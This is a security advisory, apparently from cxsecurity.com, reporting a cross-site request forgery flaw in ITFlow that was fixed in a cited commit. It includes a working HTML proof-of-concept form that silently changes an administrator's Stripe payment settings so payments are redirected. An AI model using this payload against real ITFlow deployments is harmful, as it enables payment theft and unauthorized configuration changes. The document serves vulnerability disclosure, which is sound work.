ITFlow.org CSRF system settings change

2024.02.25
cz stehled (CZ) cz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352

Open source ITFlow was vulnerable to CSRF prior commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378 This vulnerability allowed attacker changing system settings such as online payment details and Microsoft Azure SSO credentials. If admin user is logged in, we can, using provided PoC redirect him to post.php endpoint and make changes to the system. PoC below makes changes to Stripe related settings, which will lead to attacker receiving payments made through the system. <html> <form enctype="multipart/form-data" method="POST" action="https://demo.itflow.org/post.php"> <table> <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr> <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr> <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr> <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr> <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr> </table> <input type="submit" value="https://demo.itflow.org/post.php"> </form> </html>

References:

https://itflow.org/
https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378
https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top